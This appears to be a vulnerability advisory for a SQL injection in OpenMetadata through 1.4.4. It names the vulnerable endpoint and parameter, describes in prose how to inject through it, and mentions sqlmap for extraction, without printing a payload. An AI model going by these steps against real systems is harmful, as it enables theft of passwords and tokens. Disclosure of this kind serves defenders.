OpenMetadata SQL Injection Vulnerability in DocStoreDAO Interface

A SQL injection vulnerability has been identified in OpenMetadata versions through 1.4.4. The issue arises in the DocStoreDAO interface, specifically within the listCount function, where the entityType parameter is used to construct a SQL query. This vulnerability allows an attacker to extract information from the database.

Impact

Exploitation of this vulnerability could lead to unauthorized data extraction from the database, including sensitive information such as passwords and JWT tokens.

Reproduction

To reproduce this vulnerability, send a request to the OpenMetadata API endpoint '/api/v1/docStore' with a crafted entityType parameter that includes SQL injection payloads. The listCount function will process the parameter and execute the injected SQL, potentially allowing the extraction of database information. For example, the table name from the 'openmetadata_db' database can be retrieved by injecting a payload that exploits the SQL query construction. Once the injection is successful, tools like sqlmap can be used to automate the extraction of data from vulnerable database columns.